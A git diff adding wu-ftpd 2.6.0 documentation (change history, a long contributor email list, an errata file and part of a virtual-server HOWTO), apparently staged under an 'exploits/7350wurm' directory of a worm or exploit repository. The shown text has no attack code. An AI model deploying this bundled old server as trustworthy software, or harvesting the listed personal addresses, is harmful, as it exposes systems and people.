+ o  The conversion table has been moved to a separate file.  The fields
+    are:
+           %s:%s:%s:%s:%s:%s:%s:%s
+           Field    Description
+            1       strip prefix
+            2       strip postfix
+            3       addon prefix
+            4       addon postfix
+            5       external command
+            6       types
+            7       options
+            8       description
+ o  Added following abilites configurable in the ftpaccess file.  See
+    ftpaccess(5).
+        chmod            <yes|no>  <typelist>
+        delete           <yes|no>  <typelist>
+        overwrite        <yes|no>  <typelist>
+        umask            <yes|no>  <typelist>
+        upload           <dir>     <yes|no>  <owner>  <group>  <mode>
+        passwd_check     <none|trivial|rfc822>  {<warn|enforce>}
+        alias            <name>    <dir>
+        path_filter      <typelist>  <msg>  <charset>  {<disallowed> ...}
+ o  ftpcount no longer displays multiple listings for classes that have
+    multiple "class ..." lines.
+ o  Bryan D O'Conner took over as the principal developer for Release 2.
+    This ended a 19-month period where no updates were released.  At this
+    time the name was also shortened from wuarchive-ftpd to wu-ftpd.
+    Bryan used BSD ftpd version 5.60 as his base, merging the changes from
+    the earlier BSD ftpd Chris used.  BSD ftpd version 5.60 was the version
+    included in the "Final BSD Release".  UUnet Technologies maintains a
+    full copy of the final BSD release at ftp.uu.net.
+###########################################################################
+Changes in 1.1: Released 23 September, 1991
+    This was an interim release of wuarchive's modified FTP server.  It is
+    believed to be the first public release of the daemon.
+    There are indications of attempts to track BSD versions, through BSD
+    6.14, but internal information in the releases lead me to believe these
+    were local to the FTP site we found them at, and not official releases
+    from Chris Myers.
+ o  The changes for 1.1 were lost.  Most likely they were to merge the
+    changes from the BSD version he first used (probably  5.59) and 5.60,
+    or they were minor bug fixes which Chris felt no need to discuss since
+    1.0 had not been publicly released.
+###########################################################################
+Changes in 1.0: Believed not to have been publicly released.
+    This is believed to have not been publicly released, but was the
+    original version used to implement wuarchive.wustl.edu; the success of
+    this version appears to have prompted the public release of version
+    1.1 after some minor corrections.
+    If you have an original copy of 1.0, the WU-FTPD Development Group
+    would like a copy.  Probable release dates are between 3 December,
+    1990, and 23 September, 1991.
+ o  Some older clients cannot handle multi-line replies.  These can be
+    disabled on a per-connection basis by using a dash (-) as the first
+    character of the user's password.
+ o  Added ftpaccess control file.  The following commands are available:
+        limit   <class> <n> <times> <message_file>
+        class   <class> <typelist> <addrglob>{ <addrglob>}{ <addrglob>}{ <addrglob>}
+        deny    <addrglob> <message_file>
+        loginfails <number>
+        log     transfers <typelist> <directions>
+        log     commands <typelist>
+        readme  <path> {<when>}
+        message <path> {<when>}
+        banner <path>
+        private <path>
+        guestgroup  <groupname> [<groupname> ...]
+        autogroup <groupname> <class> [<class> ...]
+        compress <yes|no> <classglob> [<classglob> ...]
+        tar <yes|no> <classglob> [<classglob> ...]
+        shutdown <path>
+    Refer to the CHANGES file in the release for a full description of
+    these new features.
+ o  Added the following command-line options:
+        -a   Enable use of ftpaccess file (access file MUST exist if used)
+        -A   Disable use of ftpaccess file
+        -L   Turn on command logging (See note. Overridden by ftpaccess, if used)
+        -i   Turn on file reception logging (overridden by ftpaccess, if used)
+        -o   Turn on file transmission logging (overridden by ftpaccess, if used)
+    NOTE: If the -L flag is used, command logging will be on by default as
+    soon as the ftp server is invoked.  This will cause the server to log
+    all USER commands, which if a user accidentally enters a password for
+    that command instead of the username, will cause passwords to be logged
+    via syslog.
+    The -L flag is overridden by the ftpaccess file, if it is used --
+    command logging options in the ftpaccess file take effect IMMEDIATELY
+    upon entry of the USER command (before logging takes place).
+ o  There are some extensions to the FTP server such that if the user
+    specifies a filename (when using a RETRIEVE command) such that:
+        True Filename      Specified Filename   Action
+        ------------------ -------------------- ---------------------------------------
+        <filename>.Z       <filename>           Decompress file before transmitting
+        <filename>         <filename>.Z         Compress <filename> before transmitting
+        <filename>         <filename>.tar       Tar <filename> before transmitting
+        <filename>         <filename>.tar.Z     Tar and compress <filename> before transmitting
+ o  The FTP server will attempt to check for valid e-mail addresses and
+    chide the user if he doesn't pass the test.  For users whose FTP client
+    will hang on "long replies" (i.e. multiline responses), using a dash as
+    the first character of the password will disable the server's lreply()
+    function.
+ o  The FTP server can also log all file transmission and reception,
+    keeping the following information for each file transmission that takes
+    place.
+        Mon Dec  3 18:52:41 1990 1 wuarchive.wustl.edu 568881 /files.lst.Z a _ o a chris@wugate.wustl.edu ftp 0 *
+        %.24s %d %s %d %s %c %s %c %c %s %s %d %s
+          1   2  3  4  5  6  7  8  9  10 11 12 13
+        1 current time in the form DDD MMM dd hh:mm:ss YYYY
+        2 transfer time in seconds
+        3 remote host name
+        4 file size in bytes
+        5 name of file
+        6 transfer type (a>scii, b>inary)
+        7 special action flags (concatenated as needed):
+            C   file was compressed
+            U   file was uncompressed
+            T   file was tar'ed
+            _   no action taken
+        8 file was sent to user (o>utgoing) or received from user (i>ncoming)
+        9 accessed anonymously (r>eal, a>nonymous) -- mostly for FTP
+        10 local username or, if guest, ID string given (anonymous FTP password)
+        11 service name ('ftp', other)
+        12 authentication method (bitmask)
+            0   none
+            1   RFC931 Authentication
+        13 authenticated user id (if available, '*' otherwise)
+ o  Chris Myers was the original author of wuarchive-ftpd.  He based his
+    work upon the University of California, Berkeley, (BSD) ftpd, most
+    likely version 5.59.
+    The WU-FTPD Development Group has BSD ftpd versions 5.51 and 5.60 (both
+    found at the UUnet FTP site).  An analysis of these versions shows
+    Chris Myers used a version somewhere between them; most likely 5.59.
+    If you have an original copy of BSD ftpd between these versions, dated
+    between 8 May, 1989, and 12 April, 1991, we would like to examine a
+    copy.
+###########################################################################
+In the beginning there was the void.
+And BSD said ...
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/CONTRIBUTORS b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/CONTRIBUTORS
new file mode 100644
index 0000000..bb1f328
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/CONTRIBUTORS
@@ -0,0 +1,344 @@
+The following individuals and organizations have contributed, directly or
+indirectly to the development of WU-FTPD.
+While attempts were made to be as complete as possible, it is inevitable
+that some contributors have been omitted.  For that, please accept our
+humble appologies.
+Please remember, when reading through this list, that email addresses
+change.  Some shown below will be in excess of ten years old.  It is
+unlikely all the addresses shown below are deliverable.  Under no
+circustances should you attempt to contact these individuals.  Any email
+concerning the WU-FTPD daemon should be addressed to
+wuftpd-questions@wu-ftpd.org.
+100326.567@CompuServe.COM
+aaron@onr.com
+abe@vic.cc.purdue.edu
+ache@nagual.pp.ru (Andrey A. Chernov)
+achurch@dragonfire.net (Andy Church)
+ae@is.dal.ca
+ai@vsu.ru (Andy Igoshin)
+ajudge@maths.tcd.ie
+alain.magloire@rcsm.ee.mcgill.ca (Alain Magloire)
+alann@ihs.com (Alan Neiman)
+Albert-Lunde@nwu.edu (Albert Lunde)
+alden@math.ohio-state.edu
+alexis@dawn.ww.net
+amoss@cs.huji.ac.il
+Anders.X.Thulin@telia.se
+andras@is.co.za (Andras Salamon)
+antonio@ifi.unizh.ch
+archive-admins@uunet.uu.net (UUNET Technologies)
+are@communique.no (Are Bryne)
+aris@ccs.neu.edu (Aris Yannopoulos)
+auscert@auscert.org.au (AUSCERT)
+awyskow@uswest.com (Alan Wyskowski)
+ayamura@ayamura.org (Ayamura Kikuchi)
+babina@pex.net
+bartm@cv.ruu.nl (Bart Muyzer)
+bat@xdiv.lanl.gov
+beckers@josephus.furph.com (Becki Kain)
+beck@ugrad.cs.ualberta.ca (Bob Beck)
+bergman@hercules.PHRI.NYU.EDU (Mark Bergman)
+ (Berkeley Software Design, Inc.)
+bero@mandrakesoft.com (Bernhard Rosenkraenzer)
+b.g.leighfield@blcmp.org.uk
+bill@netagw.com (Bill Aten)
+bjkramer@pluto.njcc.com (Brian Kramer)
+blayne@geom.umn.edu (Blayne Puklich)
+bob@ti.com (Bob Luckin)
+bozy@fiona.com.cy
+bret@rehost.com (Bret McDanel)
+bristgt@haven.msfc.nasa.gov (Tom Brister)
+brmeijer@worldonline.nl (Bas Meijer)
+brown@ftms.COM (Vidiot)
+bryan@fegmania.wustl.edu (Bryan D. O'Connor)
+c15o@zfn.uni-bremen.de
+canuck@caam.rice.edu (Mike Pearlman)
+carrier@ced.berkeley.edu (Stephen P. Carrier)
+cert@cert.org (CERT Coordination Center)
+cfuga@colossus.rhon.itam.mx
+chrisb@siggy.iceonline.com (Chris Brown)
+Christer.Holgersson@UMDAC.UmU.SE (Christer Holgersson)
+christos@zoulas.com (Christos Zoulas)
+chris@westnet.com
+chris@wugate.wustl.edu (Chris Myers)
+cj10@cam.ac.uk (C.J. Jardine)
+cky@bryanadams.ml.org (Chris K. Young)
+claude@infobiogen.fr
+cmyers@kiski.net (Chris Myers)
+corrigan@ucsd.edu
+cprice@molbio.unmc.edu (Chad Price)
+crosser@average.org
+daleg@orion.digex.net (Dale Ghent)
+ (Dan Thorson)
+dangona@nist.gov (Steve D'Angona)
+datta@cs.uwp.edu (Dave Datta)
+David.Capshaw@SEMATECH.Org (David Capshaw)
+davidp@cableol.net (David Pesticcio)
+dbaker@jeep.ops.neosoft.com (Daniel Baker)
+Debbie.Pomerance@mail.house.gov (Debbie Pomerance)
+dewitt@williams.edu (DeWitt Clinton)
+dg@root.com
+dg@ulysium.net
+distler@golem.ph.utexas.edu (Jacques Distler)
+dlq@mail.RATH.PeachNet.EDU (David Quarterman)
+drl@vuse.vanderbilt.edu (David R. Linn)
+dsf@frontiernet.net
+duncan@MCS.VUW.AC.NZ (Duncan McEwan)
+dupuis@lei.ucl.ac.be (Pascal A. Dupuis)
+eduard.vopicka@vse.cs (Eduard Vopicka)
+eiji@papanui.ddt.or.jp (Eiji Kuramoto)
+eilon@aristo.tau.ac.il (Eilon Gishri)
+e.j.r.leyssens@student.utwente.nl (Eli-Jean Leyssens)
+emil.isberg@mds.mdh.se (Emil Isberg)
+ener@firehouse.net
+enout@eurecom.fr (Alain ENOUT)
+eric@sendmail.org (Eric P. Allman)
+ernestm@mindspring.com (Ernest Mueller)
+evanc@synapse.net (Evan Champion)
+explorer@iastate.edu
+facq@U-Bordeaux.FR (Laurent FACQ)
+fangchin@azc.com (Chin Fang)
+fcusack@iconnet.net (Frank Cusack)
+felicity@kluge.net (Theo Van Dinter)
+fishbowl@netcomi.com
+flaps@dgp.toronto.edu (Alan J Rosenthal)
+fmouse@fmp.com
+frank@Kirk.NetUnlimited.net (Frank Mogaddedi)
+ (Free Software Foundation, Inc.)
+fxa@boombox.micro.umn.edu (Farhad Anklesaria)
+gafton@redhat.com (Cristian Gafton)
+GBaysing@HiWAAY.net (Geoff Baysinger)
+ghelmer@dsuvax.dsu.edu
+gilles_ciselet@be.ibm.com
+gjermund@nextel.no (Gjermund Sxrseth)
+glenn@cs.hmc.edu (Glenn Matthew Gebhart)
+glenn@more.net (Glenn Nielsen)
+greg@ceylon.ragnet.com (Greg)
+greg@waughs.com (Greg Waugh)
+gruner@informatik.tu-muenchen.de
+gryphon@healer.com (Coranth Gryphon)
+guenther@ira.uka.de
+gunnar@bitcon.no (Gunnar Helliesen)
+gustavo@movicom.movi.com.ar (Gustavo Zacarias)
+gwynp@artware.qc.ca (Philip Gwyn)
+handley@admin.microserve.net (Mike Handley)
+helm@fionn.es.net (Michael Helm)
+hilgert@powerpc.lion.de (Thomas Hilgert)
+hmarson@ibm.net (Hamish N Marson)
+hobbit@AVIAN.ORG (Al Walker)
+hogden@rge.com (Brett M Hogden)
+ianw@sco.com (Ian Willis)
+I.A.Saez.Scheihing@urc.tue.nl
+icculus@visi.net
+ioresult@usa.net (P. Kearney III)
+isf55@tid.es
+ (J. Zawinski)
+ (Jaakko Hyvatti)
+james@corp.netcom.net.uk
+james@tiger.hcht.edu.tw (Chun-Hsiung Chiu)
+jbf@schubert.telepac.pt
+ (Jeff Laing)
+jeff@onion.rain.com
+jfw@jfwhome.funhouse.com (John F. Woods)
+jgross@uiuc.edu (Joe Gross)
+jieff@odie.mcom.fr (Jean-Francois Monnet)
+Jim_Marnell@cca-int.com
+Jim.Stosick@Forsythe.Stanford.EDU (Jim Stosick)
+jlewis@inorganic5.fdt.net (Jon Lewis)
+jms@uic.edu (John Schulien)
+joge@stud.ntnu.no (Geir Johannessen)
+john.ladwig@soils.umn.edu
+john@nexnix.co.uk (John Marshall)
+jose@haulpak.com (Jose Santiago)
+joshua@ednet.co.uk (Joshua Goodall)
+jos@xos.nl (Jos Vos)
+jpr5@netect.com (Jordan Ritter)
+jwhite@codeweavers.com (Jeremy White)
+JWHITFIELD@wwcc.cc.wy.us
+karl@hci.national-physical-lab.co.uk
+kaspar@soften.ktu.lt (Aidas Kasparas)
+kazuhiko@mars.club.or.jp (Wakui Kazuhiko)
+ (kazushi Marukawa)
+kdb@unx.sas.com
+keller@bfg.com (Ted Keller)
+kent@landfield.com (Kent Landfield)
+kero@elite.watt.rhno.columbia.edu (Ueber Sheep)
+kir@rus.net
+klmitch@MIT.EDU (Kevin L. Mitchell)
+komine@cc.meisei-u.ac.jp (Kazuyoshi Komine)
+koos@pizza.hvu.nl (Koos van den Hout)
+kroz@cs.columbia.edu (Fred Korz)
+kshipley@jh-kvi.com (Kirk Shipley)
+kuersch@ita.uni-heidelberg.de (Rainer Kuerschner)
+lamont@cranston.fc.hp.com (LaMont Jones)
+lamont@security.hp.com
+Laurent.Ghys@ircam.fr (Laurent Ghys)
+leavitt@webcom.com
+leif@imho.net (Leif Ericksen)
+lenny@icus.com
+libove@felines.org (Jay Vassos-Libove)
+lmjm@icparc.ic.ac.uk (Lee McLoughlin)
+logic@shell.break.com.au
+Luc.Beurton@fnet.fr (Luc Beurton)
+luc@scylla.math.mcgill.ca (Luc Lalonde)
+lundberg@vr.net (Gregory A Lundberg)
+luomat@peak.org (Timothy J. Luoma)
+mahadi@mtk.kpm.my
+Marc.Baudoin@hsc.fr.net (Marc Baudoin)
+Marc.Baudoin@solsoft.com (Marc Baudoin)
+marcs@znep.com (Marc Slemko)
+marc@www.destek.net (Marc Evans)
+marekm@i17linuxb.ists.pwr.wroc.pl (Marek Michalkiewicz)
+ (Mark Galbraith)
+marta@mdp.edu.ar (Marta Ferreyra)
+ (Massachusetts Institute of Technology)
+mats.petersson@mbox301.swipnet.se
+matt.soffen@beasys.com (Matt Soffen)
+mau@ipifidpt.difi.unipi.it
+maw@paradigm.co.za
+mbrennen@fni.com (Michael Brennen)
+mcb@compaq.com
+mcbride@gdwest.gd.com
+mdavis@cts.com
+mding@hcia.com
+metcalf@cag.lcs.mit.edu (Chris Metcalf)
+mhpower@mit.edu (Matt Power)
+michael@ra.TSS.PeachNet.EDU
+migi@zuo.dec.com (Miguel Mena)
+mike@atlas.physchem.chemie.uni-tuebingen.de
+mikedoug@texas.net
+mjl@squid.jpl.nasa.gov (Mark Lysek)
+mjo@fmsrl7.srl.ford.com (Mike J. O'Connor)
+mmclagan@invlogic.com (Mike McLagan)
+mr@cica.indiana.edu (Mike Regoli)
+mrichard@mtt.ca (Maurice Richard)
+mschmidt@Fh-Koblenz.DE (Michael Schmidt)
+muewi@Informatik.Uni-Bremen.DE (Wilhelm Mueller)
+myers@umich.edu (Eric Myers)
+nagasima@sdd.siznes.nec.co.jp (Syunji NAGASIMA)
+neighorn@quatloo.scn.rain.com (Steven C Neighorn)
+nick@null.net (Nicholas Crawford)
+nik@acs.bu.edu (Nik Conwell)
+nikm@cyberflunk.com (Nikos Mouat)
+nmm1@cus.cam.ac.uk (Nick Maclaren)
+nneul@umr.edu (Nathan Neulinger)
+noid@cyborg.larc.nasa.gov
+nrjw@chevron.com
+ofer@stat.Berkeley.EDU (Ofer Licht)
+okir@caldera.de (Olaf Kirch)
+Ole.H.Nielsen@fysik.dtu.dk (Ole Holm Nielsen)
+oliver@billix.franken.de (Oliver Billmann)
+oneill@cs.uml.edu (Brian O'Neill)
+palmieri@quadrix.com (Thomas Palmieri)
+paulf@aphrodite.com (Paul Forgey)
+paul@obs.net (Paul Whittenburg)
+pauls@locust.etext.org (Paul Southworth)
+pb@techno.org (Patrik Backstrom)
+perf@efd.lth.se
+perrot@francenet.fr (Gildas Perrot)
+perry@news.IAEhv.nl
+Peter.Newman@hcn.net.au (Peter Newman)
+pguyot@cvf.fr
+phil@cgrg.ohio-state.edu (Phil Ritzenthaler)
+philip@intercon.com (Philip Kearney III)
+Philippe.Langlois@INTRINsec.com (Philippe Langlois)
+philipp@enteka.com
+pi@aztec.co.za (Pieter Immelman)
+Piete.Brooks@cl.cam.ac.uk (Piete Brooks)
+pkern@utcc.utoronto.ca (P Kern)
+prb@bsdi.com (Paul Borman)
+pschwan@cmu.edu (Phil Schwan)
+rah@lynx.lz.att.com (Roger Hanke)
+ra@hp.is (Richard Allen)
+rand@aero.und.nodak.edu
+randall.blahut@langley.af.mil (Randy Blahut)
+rfg@segfault.monkeys.com
+rh@idle.trapdoor.vip.at (Rene Hexel)
+ric@Artisoft.COM
+richard@atheist.tamu.edu
+richard@swansong.stg.brown.edu
+richmond@k2.llnl.gov (George H Richmond)
+rich@Rice.edu
+rkw@creek.bsd.att.com (Roger K. Winters)
+robin@is.co.za
+rob@mainstream-tech.com (Rob Nichols)
+rodrigo@dc.ufscar.br (Rodrigo Costa Colossi)
+rog@therion.lamc.utexas.edu
+ronald@demon.net
+root@anubis.science.unitn.it (Valter Cavecchia)
+root@cwo.com (Jorg Bielak)
+root@internexus.net
+root@kirk.vossnet.de
+root@startrek.in-trier.de
+root@univ.uniyar.ac.ru (Alexander)
+rosc@fbn.dandy.net (Roscinante)
+rosen@eosdata.gsfc.nasa.gov (Wayne Rosen)
+roy@atlantic.net (Jonathan Roy)
+rparry@hydrolab.arsusda.gov (Rob Parry)
+rse@engelschall.com (Ralf S. Engelschall)
+rsw@Glue.umd.edu (Randall S. Winchester)
+samkaski@cs.helsinki.fi (Samuli Kaski)
+sblair@dell.com
+schoepf@uni-mainz.de
+schultz@science.widener.edu (Marty Schultz)
+scott@galileo.cuug.ab.ca
+scott_mackay@mail.rte.com
+Scott.Parmenter@trw.com (Scott Parmenter)
+scrappy@ki.net (Marc G. Fournier)
+security@kinch.ark.com
+semdmail@sendmail.com (Sendmail, Inc.)
+serge@genesyslab.com (Sergey Zhuk)
+sgarrett@technomancer.com
+shadow@johnstown.andrew.cmu.edu (Derrick J. Brashear)
+shibata@isc.chubu.ac.jp (Shoichi Shibata)
+shingo@fla.fujitsu.com (Shingo Fujimoto)
+sinder@thp.Uni-Koeln.DE
+s-isoda@ricelabo.com (Shigeharu Isoda)
+sob@academ.com (Stan Olan Barber)
+sohos@enviro-eng.com
+Speier.Guy@cnf.com (Guy J Speier)
+sr@inri.com
+staikos@0wned.org (George Staikos)
+stanonik@nprdc.navy.mil
+stevecs@chaven.com (Stephen Costaras)
+steve@sccsi.com
+stpiera@awl.com (Aaron St. Pierre)
+sullivan@odysseus.gonzaga.pvt.k12.dc.us
+suse@wavenet.it (Simone Castellaneta)
+swcxt@boco.co.gov
+sxk13@psu.edu
+sylvain@nasirc.hq.nasa.gov (Greg Sylvain)
+tchrist@jhereg.perl.com
+thianlengvictor.tan@bnpgroup.com
+thogard@not.abnormal.com
+tin@smsc.sony.com
+tkevans@eplrx7.es.dupont.com (Tim Evans)
+torben.leifsen@astro.uio.no
+trosmus@nwnexus.net (Tim Rosmus)
+tsurmacz@ict.pwr.wroc.pl (Tomasz R. Surmacz)
+ttsg@ttsg.com (Scott J Ellentuch)
+tundra@nnenews.com
+tyw@deltanet.com (T.Y. Wu)
+ (University of California, Berkeley and its contributors)
+urishe@mail.inter.net.il (Uri)
+vic@perceptive.net (Vic Summerour)
+viljar@ats.cyber.ee (Viljar Tulit)
+vmsapiro@tigr.org (Vadim M. Sapiro)
+vogel@physik.unizh.ch (Stefan Vogel)
+volker@Illuminatus.MZ.Rhein-Main.DE (Volker Schmidt)
+wally.winzer@ChampUSA.COM (Auteria Wally Winzer Jr)
+ (Washington University in Saint Louis and its contributors)
+wfp5p@tigger.itc.virginia.edu (Bill Pemberton)
+whatis@yyz.com (Steven Boswell)
+whitakek@baileys-emh5.army.mil (Kenneth Whitaker)
+whn@topelo.lopi.com
+wls@astro.umd.edu
+Wolfram.Schmidt@iao.fhg.de (Wolfram Schmidt)
+wymanm@is.rice.edu (Wyman Eric Miles)
+x920031@rubb.rz.ruhr-uni-bochum.de
+yjh@styx.cabel.net (Iouri Kharon)
+y-koga@ccs.mt.nec.co.jp (Koga Youichirou)
+yua@artlover.com (Alex Yu)
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/ERRATA b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/ERRATA
new file mode 100644
index 0000000..4cb1eb1
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/ERRATA
@@ -0,0 +1,68 @@
+ 
+  Copyright (c) 1999 WU-FTPD Development Group.  
+  All rights reserved.
+  
+  Portions Copyright (c) 1980, 1985, 1988, 1989, 1990, 1991, 1993, 1994
+    The Regents of the University of California.
+  Portions Copyright (c) 1993, 1994 Washington University in Saint Louis.
+  Portions Copyright (c) 1996, 1998 Berkeley Software Design, Inc.
+  Portions Copyright (c) 1989 Massachusetts Institute of Technology.
+  Portions Copyright (c) 1998 Sendmail, Inc.
+  Portions Copyright (c) 1983, 1995, 1996, 1997 Eric P.  Allman.
+  Portions Copyright (c) 1997 by Stan Barber.
+  Portions Copyright (c) 1997 by Kent Landfield.
+  Portions Copyright (c) 1991, 1992, 1993, 1994, 1995, 1996, 1997
+    Free Software Foundation, Inc.  
+ 
+  Use and distribution of this software and its source code are governed 
+  by the terms and conditions of the WU-FTPD Software License ("LICENSE").
+ 
+  If you did not receive a copy of the license, it may be obtained online
+  at http://www.wu-ftpd.org/license.html.
+ 
+  $Id: ERRATA,v 1.7 1999/09/05 02:46:01 wuftpd Exp $
+Known problems (2.6.0)
+=====================
+These are problems which are know and will be corrected in future versions.
+class=
+------
+The 'class=' phrase does not work as documented in the
+upload.configuration.HOWTO.  This is because the way the ftpaccess file is
+handled is far too simplistic for the feature.  This is most appearent on
+the delete, rename, overwrite and chmod clauses.
+To work arround this problem, you first need to know the default for these
+clauses is 'no' for anonymous users and 'yes' for real and guest users.  To
+override the default for a specific class, you can use the 'class=' phrase.
+The problem occurs when you want to override the default for all but a
+given class; in this case you'll need to explicitly list each class.
+getcwd()
+--------
+A number of systems have no getcwd() function or their implementation of
+the function is broken in some way.  A portable version of the getcwd()
+function has been included in the support directory.  NeXTstep version 3
+(nx3) and SunOS 4.1 (s41) are configured to use this portable version of
+getcwd().  If your system is one of the following systems, and you get this
+portable version to work, please report any change needed so we may include
+them in a future release.  Remember, systems without a working getcwd()
+have an identified security problem.
+Systems needing getcwd():
+  BSD 4.4       (bsd)
+  Unix 3.x      (dec)
+  DG/UX         (dgx)
+  Dynix         (dyn)
+  generic       (gen)
+  NeXTstep 2.x  (nx2)
+  OSF/1         (osf)
+  Sony NewsOS   (sny)
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/HOWTO/VIRTUAL.FTP.SUPPORT b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/HOWTO/VIRTUAL.FTP.SUPPORT
new file mode 100644
index 0000000..90c9542
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/HOWTO/VIRTUAL.FTP.SUPPORT
@@ -0,0 +1,722 @@
+ 
+  Copyright (c) 1999 WU-FTPD Development Group.  
+  All rights reserved.
+  
+  Portions Copyright (c) 1980, 1985, 1988, 1989, 1990, 1991, 1993, 1994
+    The Regents of the University of California.
+  Portions Copyright (c) 1993, 1994 Washington University in Saint Louis.
+  Portions Copyright (c) 1996, 1998 Berkeley Software Design, Inc.
+  Portions Copyright (c) 1989 Massachusetts Institute of Technology.
+  Portions Copyright (c) 1998 Sendmail, Inc.
+  Portions Copyright (c) 1983, 1995, 1996, 1997 Eric P.  Allman.
+  Portions Copyright (c) 1997 by Stan Barber.
+  Portions Copyright (c) 1997 by Kent Landfield.
+  Portions Copyright (c) 1991, 1992, 1993, 1994, 1995, 1996, 1997
+    Free Software Foundation, Inc.  
+ 
+  Use and distribution of this software and its source code are governed 
+  by the terms and conditions of the WU-FTPD Software License ("LICENSE").
+ 
+  If you did not receive a copy of the license, it may be obtained online
+  at http://www.wu-ftpd.org/license.html.
+ 
+  $Id: VIRTUAL.FTP.SUPPORT,v 1.2 1999/09/26 12:48:18 wuftpd Exp $
+ 
+                                   [----]
+            Method for Supporting Virtual FTP Servers in WU-FTPD
+                                   [----]
+                              Table of Contents
+       1. Introduction
+       2. What is virtual FTP server support ?
+       3. Setup Overview
+       4. Configuring IP Address Aliases
+          4.1. Configuring IP Aliases on Sun Solaris 2.5
+          4.2. Configuring IP Aliases on SGI
+          4.3. Configuring IP Aliases on FreeBSD
+          4.4. Configuring IP Aliases on AIX
+          4.5. After system configuration
+          4.6. Testing interfaces
+       5. Building the software
+       6. Setting up the directory structure for virtual server support
+       7. Configuring to support Virtual FTP Server Support
+          7.1. Background
+          7.1.1. Limited Virtual Hosting Support:
+          7.1.2. Complete Virtual Hosting Support:
+          7.2. Create an ftpservers file:
+          7.3. Virtual ftpaccess files:
+          7.4. Master ftpaccess file Modifications:
+          7.5. Adding other virtual domain files
+       8. Setting up other support files
+       9. Supporting virtual logging
+      10. Shutting down your virtual FTP servers
+      11. Restarting your shutdown virtual FTP servers
+      12. Testing Your New Shiny Virtual Server Setup
+                                   [----]
+1. Introduction
+---------------
+     So you want to setup more than one FTP server on the same
+     machine....
+     To make it work you will need to use the virtual server support in
+     wu-ftpd. What follows are instructions for building the software
+     and configuring it to use virtual servers. 
+                                   [----]
+2. What is virtual FTP server support ?
+---------------------------------------
+     If you wish to manage an ftp server for two separate domains on
+     the same machine then you need to be able to support virtual FTP
+     servers. Basically, this allows an administrator to configure
+     their system so a user ftping to ftp.domain1.com gets one ftp
+     banner and one ftp directory and a user ftping to ftp.domain2.com
+     gets another banner and directory even though they are on the same
+     machine and use the same ports.
+     Virtual ftp servers make supporting multiple domains a lot less
+     costly and are easier to maintain than multiple ftp servers on
+     multiple machines.
+                                   [----]
+3. Setup Overview
+-----------------
+     In order to set up a virtual ftp server environment you need to
+     understand what it is you're about to do. What follows is a brief
+     overview of the process ahead.
+        * You will be configuring your machine to respond to multiple
+          IP addresses. This is done via IP Address Aliases described
+          below. First, you need to acquire the IP addresses you'll
+          need. Once you have an IP address for each virtual server you
+          wish to setup, you are ready to proceed.
+        * Once you can see both addresses from the network, you will
+          need to build and install the wu-ftpd software to support
+          virtual servers.
+        * Next you need to setup up the ftp directory structure for
+          each virtual server you wish to support. You will need to
+          customize the banner and message files in each of the virtual
+          server areas.
+        * With the directories in place you are ready to configure the
+          configuration files and specify the virtual server specific
+          information.
+        * In order to be able to separate out who is logging in to what
+          virtual server, you'll need to configure the system logging.
+          This allows you to maintain separate logfiles depicting the
+          activity of each virtual server.
+        * And finally, you need to test your configuration. Once that
+          is accomplished you can feel pleased with yourself and begin
+          populating the individual ftp directories with data as
+          appropriate.
+     Additionally, you need to know how to shutdown and restart access
+     to your real, anonymous and virtual servers in the event you need
+     to.
+                                   [----]
+4. Configuring IP Address Aliases
+---------------------------------
+     You have to be able to setup IP address aliases in order for the
+     virtual server support in wu-ftpd to work. Linux and BSDI,
+     FreeBSD, SGI, Solaris 2.5*, AIX and others support this. What
+     follows are "general" instructions on how to configure IP address
+     aliases for the specified systems. Please check your system's
+     'ifconfig' documentation for specific instructions.
+     In order to make the changes to the required system files you will
+     first need to login as root.
+     4.1. Configuring IP Aliases on Sun Solaris 2.5:
+     -----------------------------------------------
+       1. Assure/place the system's normal hostname/IP address in the
+          file /etc/hostname.le0.
+       2. Insert the following in the system initialization file
+          /etc/init.d/rootuser just after the if/fi test for
+          interface_names.
+          #
+          # configure virtual host interfaces quietly.
+          #
+          /sbin/ifconfig le0:1 inet XXX.XXX.XXX.XXX netmask + broadcast
+          + -trailers up 2>&1 > /dev/null
+          Replace XXX.XXX.XXX.XXX with the IP address that you wish to
+          alias.
+     4.2. Configuring IP Aliases on SGI:
+     -----------------------------------
+       1. Edit /etc/hosts to include IP address and the name of the
+          virtual server
+       2. Edit /etc/config/ipaliases.options using comments in that
+          file as a template:
+          ec0 XXX.XXX.XXX.xxx netmask 0xffffff00 broadcast
+          XXX.XXX.XXX.255
+               or
+          ec0 foobar netmask 0xffffff00 broadcast XXX.XXX.XXX.255
+       3. /etc/chkconfig -f ipaliases on
+     Replace XXX.XXX.XXX.xxx with the IP address that you wish to
+     alias.
+     Replace XXX.XXX.XXX.255 with the network's broadcast address.
+     4.3. Configuring IP Aliases on FreeBSD:
+     ---------------------------------------
+       1. If you are using a recent version of FreeBSD (3.x or 4.x):
+          Edit /etc/rc.conf and put something like the following in.
+          ifconfig_ed1_alias0="inet XXX.XXX.XXX.XXX netmask 0xffffffff"
+          (You might have to change the device name from ed1)
+       2. If you are using an old version of FreeBSD (1.x or 2.x):
+          Edit /etc/netstart and put something like the following in.
+          ifconfig de0 alias XXX.XXX.XXX.XXX netmask 0xffffffff
+          (or use ed0 or some other netmask if appropriate)
+     4.4. Configuring IP Aliases on AIX:
+     -----------------------------------
+     In the way AIX is shipped, there is no direct support for IP
+     aliases in the ODM. This does not mean that AIX does not support
+     IP aliases, it means that IP alias info is stored in an ASCII file
+     rather than in the ODM.
+       1. Edit the proper /etc/rc* file.
+          If you are currently using an ODM TCP/IP configuration, edit
+          the file /etc/rc.net.
